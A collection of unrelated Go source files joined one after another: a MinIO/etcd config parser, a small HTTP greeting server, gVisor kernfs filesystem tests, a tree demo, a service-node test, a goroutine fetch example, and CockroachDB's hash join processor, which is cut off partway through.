type Specification struct {
MinioAccessKey string `split_words:"true"`
MinioSecretKey string `split_words:"true"`
MinioEndpoint string `split_words:"true"`
EtcdSnapshotBucket string `split_words:"true"`
EtcdObjectName string `split_words:"true"`
}
// ParseENV pareses env for variables
func ParseENV() (*Specification, error) {
s := Specification{}
err := envconfig.Process("EMS", &s)
if err != nil {
return nil, err
}
return &s, nil
}
|
package main
import (
"fmt"
"net/http"
"github.com/instantup/greeting"
)
func main() {
http.HandleFunc("/hello", HelloHandler)
if err := http.ListenAndServe(":8080", nil); err != nil {
fmt.Println(err)
}
}
func HelloHandler(writer http.ResponseWriter, request *http.Request) {
query := request.URL.Query()
name := query.Get("name")
message := greeting.Hello(name)
writer.Header().Add("Content-Type", "text/plain")
if _, err := writer.Write([]byte(message)); err != nil {
fmt.Println(err)
}
}
|
// Copyright 2019 The gVisor Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package kernfs_test
import (
"bytes"
"fmt"
"testing"
"github.com/google/go-cmp/cmp"
"gvisor.dev/gvisor/pkg/abi/linux"
"gvisor.dev/gvisor/pkg/context"
"gvisor.dev/gvisor/pkg/errors/linuxerr"
"gvisor.dev/gvisor/pkg/fspath"
"gvisor.dev/gvisor/pkg/sentry/contexttest"
"gvisor.dev/gvisor/pkg/sentry/fsimpl/kernfs"
"gvisor.dev/gvisor/pkg/sentry/fsimpl/testutil"
"gvisor.dev/gvisor/pkg/sentry/kernel/auth"
"gvisor.dev/gvisor/pkg/sentry/vfs"
"gvisor.dev/gvisor/pkg/usermem"
)
const defaultMode linux.FileMode = 01777
const staticFileContent = "This is sample content for a static test file."
// RootDentryFn is a generator function for creating the root dentry of a test
// filesystem. See newTestSystem.
type RootDentryFn func(context.Context, *auth.Credentials, *filesystem) kernfs.Inode
// newTestSystem sets up a minimal environment for running a test, including an
// instance of a test filesystem. Tests can control the contents of the
// filesystem by providing an appropriate rootFn, which should return a
// pre-populated root dentry.
func newTestSystem(t *testing.T, rootFn RootDentryFn) *testutil.System {
ctx := contexttest.Context(t)
creds := auth.CredentialsFromContext(ctx)
v := &vfs.VirtualFilesystem{}
if err := v.Init(ctx); err != nil {
t.Fatalf("VFS init: %v", err)
}
v.MustRegisterFilesystemType("testfs", &fsType{rootFn: rootFn}, &vfs.RegisterFilesystemTypeOptions{
AllowUserMount: true,
})
mns, err := v.NewMountNamespace(ctx, creds, "", "testfs", &vfs.MountOptions{}, nil)
if err != nil {
t.Fatalf("Failed to create testfs root mount: %v", err)
}
return testutil.NewSystem(ctx, t, v, mns)
}
type fsType struct {
rootFn RootDentryFn
}
type filesystem struct {
kernfs.Filesystem
}
// MountOptions implements vfs.FilesystemImpl.MountOptions.
func (fs *filesystem) MountOptions() string {
return ""
}
type file struct {
kernfs.DynamicBytesFile
content string
}
func (fs *filesystem) newFile(ctx context.Context, creds *auth.Credentials, content string) kernfs.Inode {
f := &file{}
f.content = content
f.DynamicBytesFile.Init(ctx, creds, 0 /* devMajor */, 0 /* devMinor */, fs.NextIno(), f, 0777)
return f
}
func (f *file) Generate(ctx context.Context, buf *bytes.Buffer) error {
fmt.Fprintf(buf, "%s", f.content)
return nil
}
type attrs struct {
kernfs.InodeAttrs
}
func (*attrs) SetStat(context.Context, *vfs.Filesystem, *auth.Credentials, vfs.SetStatOptions) error {
return linuxerr.EPERM
}
type readonlyDir struct {
readonlyDirRefs
attrs
kernfs.InodeAlwaysValid
kernfs.InodeDirectoryNoNewChildren
kernfs.InodeNoStatFS
kernfs.InodeNotAnonymous
kernfs.InodeNotSymlink
kernfs.InodeTemporary
kernfs.InodeWatches
kernfs.OrderedChildren
locks vfs.FileLocks
}
func (fs *filesystem) newReadonlyDir(ctx context.Context, creds *auth.Credentials, mode linux.FileMode, contents map[string]kernfs.Inode) kernfs.Inode {
dir := &readonlyDir{}
dir.attrs.Init(ctx, creds, 0 /* devMajor */, 0 /* devMinor */, fs.NextIno(), linux.ModeDirectory|mode)
dir.OrderedChildren.Init(kernfs.OrderedChildrenOptions{})
dir.InitRefs()
dir.IncLinks(dir.OrderedChildren.Populate(contents))
return dir
}
func (d *readonlyDir) Open(ctx context.Context, rp *vfs.ResolvingPath, kd *kernfs.Dentry, opts vfs.OpenOptions) (*vfs.FileDescription, error) {
fd, err := kernfs.NewGenericDirectoryFD(rp.Mount(), kd, &d.OrderedChildren, &d.locks, &opts, kernfs.GenericDirectoryFDOptions{
SeekEnd: kernfs.SeekEndStaticEntries,
})
if err != nil {
return nil, err
}
return fd.VFSFileDescription(), nil
}
func (d *readonlyDir) DecRef(ctx context.Context) {
d.readonlyDirRefs.DecRef(func() { d.Destroy(ctx) })
}
type dir struct {
dirRefs
attrs
kernfs.InodeAlwaysValid
kernfs.InodeNoStatFS
kernfs.InodeNotAnonymous
kernfs.InodeNotSymlink
kernfs.InodeTemporary
kernfs.InodeWatches
kernfs.OrderedChildren
locks vfs.FileLocks
fs *filesystem
}
func (fs *filesystem) newDir(ctx context.Context, creds *auth.Credentials, mode linux.FileMode, contents map[string]kernfs.Inode) kernfs.Inode {
dir := &dir{}
dir.fs = fs
dir.attrs.Init(ctx, creds, 0 /* devMajor */, 0 /* devMinor */, fs.NextIno(), linux.ModeDirectory|mode)
dir.OrderedChildren.Init(kernfs.OrderedChildrenOptions{Writable: true})
dir.InitRefs()
dir.IncLinks(dir.OrderedChildren.Populate(contents))
return dir
}
func (d *dir) Open(ctx context.Context, rp *vfs.ResolvingPath, kd *kernfs.Dentry, opts vfs.OpenOptions) (*vfs.FileDescription, error) {
fd, err := kernfs.NewGenericDirectoryFD(rp.Mount(), kd, &d.OrderedChildren, &d.locks, &opts, kernfs.GenericDirectoryFDOptions{
SeekEnd: kernfs.SeekEndStaticEntries,
})
if err != nil {
return nil, err
}
return fd.VFSFileDescription(), nil
}
func (d *dir) DecRef(ctx context.Context) {
d.dirRefs.DecRef(func() { d.Destroy(ctx) })
}
func (d *dir) NewDir(ctx context.Context, name string, opts vfs.MkdirOptions) (kernfs.Inode, error) {
creds := auth.CredentialsFromContext(ctx)
dir := d.fs.newDir(ctx, creds, opts.Mode, nil)
if err := d.OrderedChildren.Insert(name, dir); err != nil {
dir.DecRef(ctx)
return nil, err
}
d.TouchCMtime(ctx)
d.IncLinks(1)
return dir, nil
}
func (d *dir) NewFile(ctx context.Context, name string, opts vfs.OpenOptions) (kernfs.Inode, error) {
creds := auth.CredentialsFromContext(ctx)
f := d.fs.newFile(ctx, creds, "")
if err := d.OrderedChildren.Insert(name, f); err != nil {
f.DecRef(ctx)
return nil, err
}
d.TouchCMtime(ctx)
return f, nil
}
func (*dir) NewLink(context.Context, string, kernfs.Inode) (kernfs.Inode, error) {
return nil, linuxerr.EPERM
}
func (*dir) NewSymlink(context.Context, string, string) (kernfs.Inode, error) {
return nil, linuxerr.EPERM
}
func (*dir) NewNode(context.Context, string, vfs.MknodOptions) (kernfs.Inode, error) {
return nil, linuxerr.EPERM
}
func (fsType) Name() string {
return "kernfs"
}
func (fsType) Release(ctx context.Context) {}
func (fst fsType) GetFilesystem(ctx context.Context, vfsObj *vfs.VirtualFilesystem, creds *auth.Credentials, source string, opt vfs.GetFilesystemOptions) (*vfs.Filesystem, *vfs.Dentry, error) {
fs := &filesystem{}
fs.VFSFilesystem().Init(vfsObj, &fst, fs)
root := fst.rootFn(ctx, creds, fs)
var d kernfs.Dentry
d.Init(&fs.Filesystem, root)
return fs.VFSFilesystem(), d.VFSDentry(), nil
}
// -------------------- Remainder of the file are test cases --------------------
func TestBasic(t *testing.T) {
sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
return fs.newReadonlyDir(ctx, creds, 0755, map[string]kernfs.Inode{
"file1": fs.newFile(ctx, creds, staticFileContent),
})
})
defer sys.Destroy()
sys.GetDentryOrDie(sys.PathOpAtRoot("file1")).DecRef(sys.Ctx)
}
func TestMkdirGetDentry(t *testing.T) {
sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
return fs.newReadonlyDir(ctx, creds, 0755, map[string]kernfs.Inode{
"dir1": fs.newDir(ctx, creds, 0755, nil),
})
})
defer sys.Destroy()
pop := sys.PathOpAtRoot("dir1/a new directory")
if err := sys.VFS.MkdirAt(sys.Ctx, sys.Creds, pop, &vfs.MkdirOptions{Mode: 0755}); err != nil {
t.Fatalf("MkdirAt for PathOperation %+v failed: %v", pop, err)
}
sys.GetDentryOrDie(pop).DecRef(sys.Ctx)
}
func TestReadStaticFile(t *testing.T) {
sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
return fs.newReadonlyDir(ctx, creds, 0755, map[string]kernfs.Inode{
"file1": fs.newFile(ctx, creds, staticFileContent),
})
})
defer sys.Destroy()
pop := sys.PathOpAtRoot("file1")
fd, err := sys.VFS.OpenAt(sys.Ctx, sys.Creds, pop, &vfs.OpenOptions{
Flags: linux.O_RDONLY,
})
if err != nil {
t.Fatalf("OpenAt for PathOperation %+v failed: %v", pop, err)
}
defer fd.DecRef(sys.Ctx)
content, err := sys.ReadToEnd(fd)
if err != nil {
t.Fatalf("Read failed: %v", err)
}
if diff := cmp.Diff(staticFileContent, content); diff != "" {
t.Fatalf("Read returned unexpected data:\n--- want\n+++ got\n%v", diff)
}
}
func TestCreateNewFileInStaticDir(t *testing.T) {
sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
return fs.newReadonlyDir(ctx, creds, 0755, map[string]kernfs.Inode{
"dir1": fs.newDir(ctx, creds, 0755, nil),
})
})
defer sys.Destroy()
pop := sys.PathOpAtRoot("dir1/newfile")
opts := &vfs.OpenOptions{Flags: linux.O_CREAT | linux.O_EXCL, Mode: defaultMode}
fd, err := sys.VFS.OpenAt(sys.Ctx, sys.Creds, pop, opts)
if err != nil {
t.Fatalf("OpenAt(pop:%+v, opts:%+v) failed: %v", pop, opts, err)
}
// Close the file. The file should persist.
fd.DecRef(sys.Ctx)
fd, err = sys.VFS.OpenAt(sys.Ctx, sys.Creds, pop, &vfs.OpenOptions{
Flags: linux.O_RDONLY,
})
if err != nil {
t.Fatalf("OpenAt(pop:%+v) = %+v failed: %v", pop, fd, err)
}
fd.DecRef(sys.Ctx)
}
func TestDirFDReadWrite(t *testing.T) {
sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
return fs.newReadonlyDir(ctx, creds, 0755, nil)
})
defer sys.Destroy()
pop := sys.PathOpAtRoot("/")
fd, err := sys.VFS.OpenAt(sys.Ctx, sys.Creds, pop, &vfs.OpenOptions{
Flags: linux.O_RDONLY,
})
if err != nil {
t.Fatalf("OpenAt for PathOperation %+v failed: %v", pop, err)
}
defer fd.DecRef(sys.Ctx)
// Read/Write should fail for directory FDs.
if _, err := fd.Read(sys.Ctx, usermem.BytesIOSequence([]byte{}), vfs.ReadOptions{}); !linuxerr.Equals(linuxerr.EISDIR, err) {
t.Fatalf("Read for directory FD failed with unexpected error: %v", err)
}
if _, err := fd.Write(sys.Ctx, usermem.BytesIOSequence([]byte{}), vfs.WriteOptions{}); !linuxerr.Equals(linuxerr.EBADF, err) {
t.Fatalf("Write for directory FD failed with unexpected error: %v", err)
}
}
func TestDirFDIterDirents(t *testing.T) {
sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
return fs.newReadonlyDir(ctx, creds, 0755, map[string]kernfs.Inode{
// Fill root with nodes backed by various inode implementations.
"dir1": fs.newReadonlyDir(ctx, creds, 0755, nil),
"dir2": fs.newDir(ctx, creds, 0755, map[string]kernfs.Inode{
"dir3": fs.newDir(ctx, creds, 0755, nil),
}),
"file1": fs.newFile(ctx, creds, staticFileContent),
})
})
defer sys.Destroy()
pop := sys.PathOpAtRoot("/")
sys.AssertAllDirentTypes(sys.ListDirents(pop), map[string]testutil.DirentType{
"dir1": linux.DT_DIR,
"dir2": linux.DT_DIR,
"file1": linux.DT_REG,
})
}
func TestDirWalkDentryTree(t *testing.T) {
sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
return fs.newDir(ctx, creds, 0755, map[string]kernfs.Inode{
"dir1": fs.newDir(ctx, creds, 0755, nil),
"dir2": fs.newDir(ctx, creds, 0755, map[string]kernfs.Inode{
"file1": fs.newFile(ctx, creds, staticFileContent),
"dir3": fs.newDir(ctx, creds, 0755, nil),
}),
})
})
defer sys.Destroy()
testWalk := func(from *kernfs.Dentry, getDentryPath, walkPath string, expectedErr error) {
var d *kernfs.Dentry
if getDentryPath != "" {
pop := sys.PathOpAtRoot(getDentryPath)
vd := sys.GetDentryOrDie(pop)
defer vd.DecRef(sys.Ctx)
d = vd.Dentry().Impl().(*kernfs.Dentry)
}
match, err := from.WalkDentryTree(sys.Ctx, sys.VFS, fspath.Parse(walkPath))
if err == nil {
defer match.DecRef(sys.Ctx)
}
if err != expectedErr {
t.Fatalf("WalkDentryTree from %q to %q (with expected error: %v) unexpected error, want: %v, got: %v", from.FSLocalPath(), walkPath, expectedErr, expectedErr, err)
}
if expectedErr != nil {
return
}
if d != match {
t.Fatalf("WalkDentryTree from %q to %q (with expected error: %v) found unexpected dentry; want: %v, got: %v", from.FSLocalPath(), walkPath, expectedErr, d, match)
}
}
rootD := sys.Root.Dentry().Impl().(*kernfs.Dentry)
testWalk(rootD, "dir1", "/dir1", nil)
testWalk(rootD, "", "/dir-non-existent", linuxerr.ENOENT)
testWalk(rootD, "", "/dir1/child-non-existent", linuxerr.ENOENT)
testWalk(rootD, "", "/dir2/inner-non-existent/dir3", linuxerr.ENOENT)
testWalk(rootD, "dir2/dir3", "/dir2/../dir2/dir3", nil)
testWalk(rootD, "dir2/dir3", "/dir2/././dir3", nil)
testWalk(rootD, "dir2/dir3", "/dir2/././dir3/.././dir3", nil)
pop := sys.PathOpAtRoot("dir2")
dir2VD := sys.GetDentryOrDie(pop)
defer dir2VD.DecRef(sys.Ctx)
dir2D := dir2VD.Dentry().Impl().(*kernfs.Dentry)
testWalk(dir2D, "dir2/dir3", "/dir3", nil)
testWalk(dir2D, "dir2/dir3", "/../../../dir3", nil)
testWalk(dir2D, "dir2/file1", "/file1", nil)
testWalk(dir2D, "dir2/file1", "file1", nil)
}
|
package main
import (
"fmt"
tree "github.com/adadesions/goalgo/trees/tree"
)
func main() {
rootNode := tree.Node{Data: 92}
left1 := tree.Node{Data: 100}
right1 := tree.Node{Data: 108}
rootNode.Left = &left1
rootNode.Right = &right1
fmt.Println(rootNode)
}
|
package core
import (
"testing"
"github.com/sirupsen/logrus"
)
type TestService struct{ config *ServiceConfig }
func (ts *TestService) Name() string { return "Test-" + ts.config.GetString("key") }
func (ts *TestService) Init(_ *Node, config *ServiceConfig) error {
ts.config = config
return nil
}
func (ts *TestService) Start() error { return nil }
func (ts *TestService) Stop() error { return nil }
func (ts *TestService) Status() ServiceStatus { return 0 }
func (ts *TestService) SubscribeStatus(func(ServiceStatus)) {}
func (ts *TestService) UnsubscribeStatus(func(ServiceStatus)) {}
func TestNewNode(t *testing.T) {
logrus.SetLevel(logrus.TraceLevel)
services := NewAvailableServices()
services.Register("TestService1", &TestService{})
services.Register("TestService2", &TestService{})
services.Register("TestService3", &TestService{})
config := NodeConfig{
{
"service": "TestService2",
"key": "key2",
},
{
"service": "TestService3",
"key": "key3",
},
}
node, err := NewNode(services, config)
if err != nil {
t.Error(err)
}
if len(node.Services) != 2 {
t.Errorf("len(node.Services)=%v", len(node.Services))
}
if node.GetService("Test-key2") == nil {
t.Error("service Test-key2 not found")
}
if node.GetService("Test-key3") == nil {
t.Error("service Test-key3 not found")
}
}
|
//go routines
package main
import (
"fmt"
"net/http"
"sync"
"time"
)
func returnType(url string) {
fmt.Printf(time.Now().String())
resp, err := http.Get(url)
if err != nil {
fmt.Printf("error: %s\n", err)
return
}
defer resp.Body.Close()
ctype := resp.Header.Get("content-type")
fmt.Printf("%s -> %s\n", url, ctype)
}
func main() {
fmt.Println("========Start=========")
urls := []string{
"https://golang.org",
"https://api.github.com",
"https://httpbin.org/xml",
}
//sync
for _, url := range urls {
go returnType(url)
}
var wg sync.WaitGroup //used to wait for all routines to complete and then show main
for _, url := range urls {
wg.Add(1)
//async
go func(url string) {
returnType(url)
wg.Done()
}(url)
}
wg.Wait()
fmt.Println("========End=========")
}
|
// Copyright 2016 The Cockroach Authors.
//
// Use of this software is governed by the Business Source License
// included in the file licenses/BSL.txt.
//
// As of the Change Date specified in that file, in accordance with
// the Business Source License, use of this software will be governed
// by the Apache License, Version 2.0, included in the file
// licenses/APL.txt.
package rowexec
import (
"context"
"github.com/cockroachdb/cockroach/pkg/sql/catalog/descpb"
"github.com/cockroachdb/cockroach/pkg/sql/execinfra"
"github.com/cockroachdb/cockroach/pkg/sql/execinfrapb"
"github.com/cockroachdb/cockroach/pkg/sql/rowcontainer"
"github.com/cockroachdb/cockroach/pkg/sql/rowenc"
"github.com/cockroachdb/cockroach/pkg/util/cancelchecker"
"github.com/cockroachdb/cockroach/pkg/util/log"
"github.com/cockroachdb/cockroach/pkg/util/mon"
"github.com/cockroachdb/cockroach/pkg/util/optional"
"github.com/cockroachdb/errors"
)
// hashJoinerState represents the state of the hash join processor.
type hashJoinerState int
const (
hjStateUnknown hashJoinerState = iota
// hjBuilding represents the state the hashJoiner is in when it is building
// the hash table based on the equality columns of the rows from the right
// side.
hjBuilding
// hjReadingLeftSide represents the state the hashJoiner is in when it
// reads rows from the left side.
hjReadingLeftSide
// hjProbingRow represents the state the hashJoiner is in when it uses a
// row read in hjReadingLeftSide to probe the stored hash map with.
hjProbingRow
// hjEmittingRightUnmatched represents the state the hashJoiner is in when
// it is emitting unmatched rows from the right side after having consumed
// the left side. This only happens when executing a FULL OUTER, RIGHT
// OUTER, and RIGHT ANTI joins.
hjEmittingRightUnmatched
)
// hashJoiner performs a hash join. There is no guarantee on the output
// ordering.
type hashJoiner struct {
joinerBase
runningState hashJoinerState
diskMonitor *mon.BytesMonitor
leftSource, rightSource execinfra.RowSource
// nullEquality indicates that NULL = NULL should be considered true. Used for
// INTERSECT and EXCEPT.
nullEquality bool
hashTable *rowcontainer.HashDiskBackedRowContainer
// probingRowState is state used when hjProbingRow.
probingRowState struct {
// row is the row being probed with.
row rowenc.EncDatumRow
// iter is an iterator over the bucket that matches row on the equality
// columns.
iter rowcontainer.RowMarkerIterator
// matched represents whether any row that matches row on equality columns
// has also passed the ON condition.
matched bool
}
// emittingRightUnmatchedState is used when hjEmittingRightUnmatched.
emittingRightUnmatchedState struct {
iter rowcontainer.RowIterator
}
// Context cancellation checker.
cancelChecker *cancelchecker.CancelChecker
}
var _ execinfra.Processor = &hashJoiner{}
var _ execinfra.RowSource = &hashJoiner{}
var _ execinfra.OpNode = &hashJoiner{}
const hashJoinerProcName = "hash joiner"
// newHashJoiner creates a new hash join processor.
func newHashJoiner(
flowCtx *execinfra.FlowCtx,
processorID int32,
spec *execinfrapb.HashJoinerSpec,
leftSource execinfra.RowSource,
rightSource execinfra.RowSource,
post *execinfrapb.PostProcessSpec,
output execinfra.RowReceiver,
) (*hashJoiner, error) {
h := &hashJoiner{
leftSource: leftSource,
rightSource: rightSource,
nullEquality: spec.Type.IsSetOpJoin(),
}
if err := h.joinerBase.init(
h,
flowCtx,
processorID,
leftSource.OutputTypes(),
rightSource.OutputTypes(),
spec.Type,
spec.OnExpr,
spec.LeftEqColumns,
spec.RightEqColumns,
false, /* outputContinuationColumn */
post,
output,
execinfra.ProcStateOpts{
InputsToDrain: []execinfra.RowSource{h.leftSource, h.rightSource},
TrailingMetaCallback: func() []execinfrapb.ProducerMetadata {
h.close()
return nil
},
},
); err != nil {
return nil, err
}
ctx := h.FlowCtx.EvalCtx.Ctx()
// Limit the memory use by creating a child monitor with a hard limit.
// The hashJoiner will overflow to disk if this limit is not enough.
h.MemMonitor = execinfra.NewLimitedMonitor(ctx, flowCtx.EvalCtx.Mon, flowCtx.Cfg, "hashjoiner-limited")
h.diskMonitor = execinfra.NewMonitor(ctx, flowCtx.DiskMonitor, "hashjoiner-disk")
h.hashTable = rowcontainer.NewHashDiskBackedRowContainer(
h.EvalCtx, h.MemMonitor, h.diskMonitor, h.FlowCtx.Cfg.TempStorage,
)
// If the trace is recording, instrument the hashJoiner to collect stats.
if execinfra.ShouldCollectStats(ctx, flowCtx) {
h.leftSource = newInputStatCollector(h.leftSource)
h.rightSource = newInputStatCollector(h.rightSource)
h.ExecStatsForTrace = h.execStatsForTrace
}
return h, h.hashTable.Init(
h.Ctx,
shouldMarkRightSide(h.joinType),
h.rightSource.OutputTypes(),
h.eqCols[rightSide],
h.nullEquality,
)
}
// Start is part of the RowSource interface.
func (h *hashJoiner) Start(ctx context.Context) {
ctx = h.StartInternal(ctx, hashJoinerProcName)
h.leftSource.Start(ctx)
h.rightSource.Start(ctx)
h.cancelChecker = cancelchecker.NewCancelChecker(ctx)
h.runningState = hjBuilding
}
// Next is part of the RowSource interface.
func (h *hashJoiner) Next() (rowenc.EncDatumRow, *execinfrapb.ProducerMetadata) {
for h.State == execinfra.StateRunning {
var row rowenc.EncDatumRow
var meta *execinfrapb.ProducerMetadata
switch h.runningState {
case hjBuilding:
h.runningState, row, meta = h.build()
case hjReadingLeftSide:
h.runningState, row, meta = h.readLeftSide()
case hjProbingRow:
h.runningState, row, meta = h.probeRow()
case hjEmittingRightUnmatched:
h.runningState, row, meta = h.emitRightUnmatched()
default:
log.Fatalf(h.Ctx, "unsupported state: %d", h.runningState)
}
if row == nil && meta == nil {
continue
}
if meta != nil {
return nil, meta
}
if outRow := h.ProcessRowHelper(row); outRow != nil {
return outRow, nil
}
}
return nil, h.DrainHelper()
}
// ConsumerClosed is part of the RowSource interface.
func (h *hashJoiner) ConsumerClosed() {
h.close()
}
func (h *hashJoiner) build() (hashJoinerState, rowenc.EncDatumRow, *execinfrapb.ProducerMetadata) {
for {
row, meta, emitDirectly, err := h.receiveNext(rightSide)
if err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
} else if meta != nil {
if meta.Err != nil {
h.MoveToDraining(nil /* err */)
return hjStateUnknown, nil, meta
}
return hjBuilding, nil, meta
} else if emitDirectly {
return hjBuilding, row, nil
}
if row == nil {
// Right side has been fully consumed, so move on to
// hjReadingLeftSide. If the hash table is empty, we might be able
// to short-circuit.
if h.hashTable.IsEmpty() && h.joinType.IsEmptyOutputWhenRightIsEmpty() {
h.MoveToDraining(nil /* err */)
return hjStateUnknown, nil, h.DrainHelper()
}
// If hashTable is in-memory, pre-reserve the memory needed to mark.
if err = h.hashTable.ReserveMarkMemoryMaybe(h.Ctx); err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
}
return hjReadingLeftSide, nil, nil
}
err = h.hashTable.AddRow(h.Ctx, row)
// Regardless of the underlying row container (disk backed or in-memory
// only), we cannot do anything about an error if it occurs.
if err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
}
}
}
func (h *hashJoiner) readLeftSide() (
hashJoinerState,
rowenc.EncDatumRow,
*execinfrapb.ProducerMetadata,
) {
row, meta, emitDirectly, err := h.receiveNext(leftSide)
if err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
} else if meta != nil {
if meta.Err != nil {
h.MoveToDraining(nil /* err */)
return hjStateUnknown, nil, meta
}
return hjReadingLeftSide, nil, meta
} else if emitDirectly {
return hjReadingLeftSide, row, nil
}
if row == nil {
// The left side has been fully consumed. Move on to
// hjEmittingRightUnmatched if unmatched rows on the right side need to
// be emitted, otherwise finish.
if shouldEmitUnmatchedRow(rightSide, h.joinType) {
i := h.hashTable.NewUnmarkedIterator(h.Ctx)
i.Rewind()
h.emittingRightUnmatchedState.iter = i
return hjEmittingRightUnmatched, nil, nil
}
h.MoveToDraining(nil /* err */)
return hjStateUnknown, nil, h.DrainHelper()
}
// Probe with this row. Get the iterator over the matching bucket ready for
// hjProbingRow.
h.probingRowState.row = row
h.probingRowState.matched = false
if h.probingRowState.iter == nil {
i, err := h.hashTable.NewBucketIterator(h.Ctx, row, h.eqCols[leftSide])
if err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
}
h.probingRowState.iter = i
} else {
if err := h.probingRowState.iter.Reset(h.Ctx, row); err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
}
}
h.probingRowState.iter.Rewind()
return hjProbingRow, nil, nil
}
func (h *hashJoiner) probeRow() (
hashJoinerState,
rowenc.EncDatumRow,
*execinfrapb.ProducerMetadata,
) {
i := h.probingRowState.iter
if ok, err := i.Valid(); err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
} else if !ok {
// In this case we have reached the end of the matching bucket. Check
// if any rows passed the ON condition. If they did, move back to
// hjReadingLeftSide to get the next probe row.
if h.probingRowState.matched {
return hjReadingLeftSide, nil, nil
}
// If not, this probe row is unmatched. Check if it needs to be emitted.
if renderedRow, shouldEmit := h.shouldEmitUnmatched(
h.probingRowState.row, leftSide,
); shouldEmit {
return hjReadingLeftSide, renderedRow, nil
}
return hjReadingLeftSide, nil, nil
}
if err := h.cancelChecker.Check(); err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
}
leftRow := h.probingRowState.row
rightRow, err := i.Row()
if err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
}
defer i.Next()
var renderedRow rowenc.EncDatumRow
renderedRow, err = h.render(leftRow, rightRow)
if err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
}
// If the ON condition failed, renderedRow is nil.
if renderedRow == nil {
return hjProbingRow, nil, nil
}
h.probingRowState.matched = true
shouldEmit := true
if shouldMarkRightSide(h.joinType) {
if i.IsMarked(h.Ctx) {
switch h.joinType {
case descpb.RightSemiJoin:
// The row from the right already had a match and was emitted
// previously, so we don't emit it for the second time.
shouldEmit = false
case descpb.IntersectAllJoin:
// The row from the right has already been used for the
// intersection, so we cannot use it again.
shouldEmit = false
case descpb.ExceptAllJoin:
// The row from the right has already been used for the except
// operation, so we cannot use it again. However, we need to
// continue probing the same row from the left in order to see
// whether we have a corresponding unmarked row from the right.
h.probingRowState.matched = false
}
} else if err := i.Mark(h.Ctx); err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
}
}
nextState := hjProbingRow
switch h.joinType {
case descpb.LeftSemiJoin:
// We can short-circuit iterating over the remaining matching rows from
// the right, so we'll transition to the next row from the left.
nextState = hjReadingLeftSide
case descpb.LeftAntiJoin, descpb.RightAntiJoin:
// We found a matching row, so we don't emit it in case of an anti join.
shouldEmit = false
case descpb.ExceptAllJoin:
// We're definitely not emitting the combination of the current left
// and right rows right now. If the current right row has already been
// used, then h.probingRowState.matched is set to false, and we might
// emit the current left row if we're at the end of the bucket on the
// next probeRow() call.
shouldEmit = false
if h.probingRowState.matched {
// We have found a match for the current row on the left, so we'll
// transition to the next one.
nextState = hjReadingLeftSide
}
case descpb.IntersectAllJoin:
if shouldEmit {
// We have found a match for the current row on the left, so we'll
// transition to the next row from the left.
nextState = hjReadingLeftSide
}
}
if shouldEmit {
return nextState, renderedRow, nil
}
return nextState, nil, nil
}
func (h *hashJoiner) emitRightUnmatched() (
hashJoinerState,
rowenc.EncDatumRow,
*execinfrapb.ProducerMetadata,
) {
i := h.emittingRightUnmatchedState.iter
if ok, err := i.Valid(); err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
} else if !ok {
// Done.
h.MoveToDraining(nil /* err */)
return hjStateUnknown, nil, h.DrainHelper()
}
if err := h.cancelChecker.Check(); err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
}
row, err := i.Row()
if err != nil {
h.MoveToDraining(err)
return hjStateUnknown, nil, h.DrainHelper()
}
defer i.Next()
return hjEmittingRightUnmatched, h.renderUnmatchedRow(row, rightSide), nil
}
func (h *hashJoiner) close() {
if h.InternalClose() {
h.hashTable.Close(h.Ctx)
if h.probingRowState.iter != nil {
h.probingRowState.iter.Close()
}
if h.emittingRightUnmatchedState.iter != nil {
h.emittingRightUnmatchedState.iter.Close()
}
h.MemMonitor.Stop(h.Ctx)
if h.diskMonitor != nil {
h.diskMonitor.Stop(h.Ctx)
}
}
}
// receiveNext reads from the source specified by side and returns the next row
// or metadata to be processed by the hashJoiner. Unless h.nullEquality is true,
// rows with NULLs in their equality columns are only returned if the joinType
// specifies that unmatched rows should be returned for the given side. In this
// case, a rendered row and true is returned, notifying the caller that the
// returned row may be emitted directly.
func (h *hashJoiner) receiveNext(
side joinSide,
) (rowenc.EncDatumRow, *execinfrapb.ProducerMetadata, bool, error) {
source := h.leftSource
if side == rightSide {
source = h.rightSource
}
for {
if err := h.cancelChecker.Check(); err != nil {
return nil, nil, false, err
}
row, meta := source.Next()
if meta != nil {
return nil, meta, false, nil
} else if row == nil {
return nil, nil, false, nil
}
// We make the explicit check for whether or not the row contained a NULL value
// on an equality column. The reasoning here is because of the way we expect
// NULL equality checks to behave (i.e. NULL != NULL) and the fact that we
// use the encoding of any given row as key into our bucket. Thus if we
// encountered a NULL row when building the hashmap we have to store in
// order to use it for RIGHT OUTER joins but if we encounter another
